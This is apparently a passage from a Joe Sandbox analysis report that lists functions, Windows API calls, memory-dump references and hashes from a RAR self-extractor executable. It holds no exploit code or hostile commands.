                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: c4c7fd054f964406d19e6916b6d529002463c77d1befbb67d27538f1569862ff
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: c4c7fd054f964406d19e6916b6d529002463c77d1befbb67d27538f1569862ff
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    Function 0073E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                      • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                      • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: f853ce3abbf4eca95786ef6eca335f8244e3dea0fbebc008d51c64e301c74df4
                                                                                    • Instruction ID: 04ba4f1a2aebfc33eb6569d52e36ea8b99a1085413535c1c9ee9389a7379ee99
                                                                                    • Opcode Fuzzy Hash: f853ce3abbf4eca95786ef6eca335f8244e3dea0fbebc008d51c64e301c74df4
                                                                                    • Instruction Fuzzy Hash: B5A001E66AE252FC350962516D1ADBB025DC4C5B66B30A92EF816A54C2A888194A1872
                                                                                    Function 00729F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,0072903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00729F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: 28c2e261b8b874c81c2d69744748be02e8821deb9628766301cc9436ebac1738
                                                                                    • Instruction ID: 608cf3bf3e4e5de50400361cd8b054f318acf652fa6f47e000c050cb72a1164e
                                                                                    • Opcode Fuzzy Hash: 28c2e261b8b874c81c2d69744748be02e8821deb9628766301cc9436ebac1738
                                                                                    • Instruction Fuzzy Hash: B8A0243004010D47CD001730CD0404D3711F7107C130041D4500FCF0F1C7174407C700
                                                                                    Function 0073AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0073AE72,C:\Users\user\AppData\Local\Temp\RarSFX0,00000000,0076946A,00000006), ref: 0073AC08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
                                                                                    • Instruction ID: c89f6f938b2502366a7f1a09014f124e335746d3a76d5f912cf93ee1f6f16f43
                                                                                    • Opcode Fuzzy Hash: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
                                                                                    • Instruction Fuzzy Hash: ABA012301006048782000B318F0554E76556F51741F00C024600080030C738C820A504
                                                                                    Function 00729620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,007295D6,?,?,?,?,?,00752641,000000FF), ref: 0072963B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: b91104a3384c18c4752c9843e409e25b63a1207ab07e7ede4f483a8b196c164d
                                                                                    • Instruction ID: 22ae1defe09b50a8f620567bb2664f3e45299bdf79b2b10c5f5df64693671358
                                                                                    • Opcode Fuzzy Hash: b91104a3384c18c4752c9843e409e25b63a1207ab07e7ede4f483a8b196c164d
                                                                                    • Instruction Fuzzy Hash: B8F0E270081B259FDB308A20E848B92B7F8AB12321F082B1ED1E7429E0D369698D9A40

                                                                                    Non-executed Functions

                                                                                    Function 0073C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                      • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0073C2B1
                                                                                    • EndDialog.USER32(?,00000006), ref: 0073C2C4
                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0073C2E0
                                                                                    • SetFocus.USER32(00000000), ref: 0073C2E7
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0073C321
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0073C358
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0073C36E
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0073C38C
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C39C
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C3B8
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C3D4
                                                                                    • _swprintf.LIBCMT ref: 0073C404
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0073C417
                                                                                    • FindClose.KERNEL32(00000000), ref: 0073C41E
                                                                                    • _swprintf.LIBCMT ref: 0073C477
                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0073C48A
                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0073C4A7
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0073C4C7
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C4D7
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C4F1
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C509
                                                                                    • _swprintf.LIBCMT ref: 0073C535
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0073C548
                                                                                    • _swprintf.LIBCMT ref: 0073C59C
                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0073C5AF
                                                                                      • Part of subcall function 0073AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0073AF35
                                                                                      • Part of subcall function 0073AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0075E72C,?,?), ref: 0073AF84
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                    • String ID: %s %s$%s %s %s$Ps$REPLACEFILEDLG
                                                                                    • API String ID: 797121971-3735763087
                                                                                    • Opcode ID: fae4b981ddb71fdc9934bbf391eac62bbe02812d42e397a0a49535d442d866b3
                                                                                    • Instruction ID: 41af8123e138c39991a9e39684acf271988da33a1a71e735d3e27b5ac938812c
                                                                                    • Opcode Fuzzy Hash: fae4b981ddb71fdc9934bbf391eac62bbe02812d42e397a0a49535d442d866b3
                                                                                    • Instruction Fuzzy Hash: 3891C672548348BBE221DBB4DC4DFFB77ACEB49B01F048819F649D6081E779AA048762
                                                                                    Function 0073F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0073F844
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0073F910
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0073F930
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0073F93A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 5b2c012e3b2a345be0f080fc0c206869e8fcf8870a0aa7b1078fac3f990b0e9f
                                                                                    • Instruction ID: 8b4d795f7de893f82f85794bf1835eb9a3f6497b868faec1255c92c1421c02c2
                                                                                    • Opcode Fuzzy Hash: 5b2c012e3b2a345be0f080fc0c206869e8fcf8870a0aa7b1078fac3f990b0e9f
                                                                                    • Instruction Fuzzy Hash: 3B312B75D0531DDBEB11DFA4D9897CCBBB8AF04344F1040AAE40CA7261EB759B848F44
                                                                                    Function 00726FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00726FAA
                                                                                    • _wcslen.LIBCMT ref: 00727013
                                                                                    • _wcslen.LIBCMT ref: 00727084
                                                                                      • Part of subcall function 00727A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00727AAB
                                                                                      • Part of subcall function 00727A9C: GetLastError.KERNEL32 ref: 00727AF1
                                                                                      • Part of subcall function 00727A9C: CloseHandle.KERNEL32(?), ref: 00727B00
                                                                                      • Part of subcall function 0072A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641,000000FF), ref: 0072A1F1
                                                                                      • Part of subcall function 0072A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641), ref: 0072A21F
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00727139
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00727155
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00727298
                                                                                      • Part of subcall function 00729DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007273BC,?,?,?,00000000), ref: 00729DBC
                                                                                      • Part of subcall function 00729DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00729E70
                                                                                      • Part of subcall function 00729620: CloseHandle.KERNELBASE(000000FF,?,?,007295D6,?,?,?,?,?,00752641,000000FF), ref: 0072963B
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                      • Part of subcall function 0072A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3983180755-3508440684
                                                                                    • Opcode ID: cb543fe5372484e36b0cb074a740e5d31e1602bd0ae7691a980ce9a105914def
                                                                                    • Instruction ID: bf2983cf278ef6ad317ff8b41c51e2c57f6845feea9565477c3df34b574d268f
                                                                                    • Opcode Fuzzy Hash: cb543fe5372484e36b0cb074a740e5d31e1602bd0ae7691a980ce9a105914def
                                                                                    • Instruction Fuzzy Hash: A0C10871904364EBDB25DB74ED45FEEB7A8AF08300F00455AF956E3182D77CAA44CB61
                                                                                    Function 0072E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0072E30E
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                      • Part of subcall function 00731DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00761030,00000200,0072D928,00000000,?,00000050,00761030), ref: 00731DC4
                                                                                    • _strlen.LIBCMT ref: 0072E32F
                                                                                    • SetDlgItemTextW.USER32(?,0075E274,?), ref: 0072E38F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0072E3C9
                                                                                    • GetClientRect.USER32(?,?), ref: 0072E3D5
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0072E475
                                                                                    • GetWindowRect.USER32(?,?), ref: 0072E4A2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0072E4DB
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0072E4E3
                                                                                    • GetWindow.USER32(?,00000005), ref: 0072E4EE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0072E51B
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0072E58D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                    • String ID: $%s:$CAPTION$d$tu
                                                                                    • API String ID: 2407758923-3999767388
                                                                                    • Opcode ID: 5cd292780c995709ed80d54c1d1d38fe13b5355b3198494b8ab59880a48ae736
                                                                                    • Instruction ID: 52412cedd34826daa4ca2224fe18251376983cb6f986e7a44bf64dd1636a3726
                                                                                    • Opcode Fuzzy Hash: 5cd292780c995709ed80d54c1d1d38fe13b5355b3198494b8ab59880a48ae736
                                                                                    • Instruction Fuzzy Hash: 4C81D172608355AFD710DFA8DC88A6FBBE9EB88B04F04491DFA84D3251D778E9058B52
                                                                                    Function 0074CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0074CB66
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C71E
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C730
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C742
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C754
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C766
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C778
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C78A
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C79C
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7AE
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7C0
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7D2
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7E4
                                                                                      • Part of subcall function 0074C701: _free.LIBCMT ref: 0074C7F6
                                                                                    • _free.LIBCMT ref: 0074CB5B
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 0074CB7D
                                                                                    • _free.LIBCMT ref: 0074CB92
                                                                                    • _free.LIBCMT ref: 0074CB9D
                                                                                    • _free.LIBCMT ref: 0074CBBF
                                                                                    • _free.LIBCMT ref: 0074CBD2
                                                                                    • _free.LIBCMT ref: 0074CBE0
                                                                                    • _free.LIBCMT ref: 0074CBEB
                                                                                    • _free.LIBCMT ref: 0074CC23
                                                                                    • _free.LIBCMT ref: 0074CC2A
                                                                                    • _free.LIBCMT ref: 0074CC47
                                                                                    • _free.LIBCMT ref: 0074CC5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID: hu
                                                                                    • API String ID: 161543041-1585084052
                                                                                    • Opcode ID: 97723b7191528c125ad941eda02696c70bf1c6e05c882336989d0fae05e44a57
                                                                                    • Instruction ID: 2c437eccb19b2fc8421b7be5887fff9c63b6961110366760ed8b1808f4f83f86
                                                                                    • Opcode Fuzzy Hash: 97723b7191528c125ad941eda02696c70bf1c6e05c882336989d0fae05e44a57
                                                                                    • Instruction Fuzzy Hash: 03317271A02309DFEBA2AA39D84AB5A77E9EF14310F144429F548D7192DF39EC40CF61
                                                                                    Function 007496F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00749705
                                                                                      • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                      • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                    • _free.LIBCMT ref: 00749711
                                                                                    • _free.LIBCMT ref: 0074971C
                                                                                    • _free.LIBCMT ref: 00749727
                                                                                    • _free.LIBCMT ref: 00749732
                                                                                    • _free.LIBCMT ref: 0074973D
                                                                                    • _free.LIBCMT ref: 00749748
                                                                                    • _free.LIBCMT ref: 00749753
                                                                                    • _free.LIBCMT ref: 0074975E
                                                                                    • _free.LIBCMT ref: 0074976C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
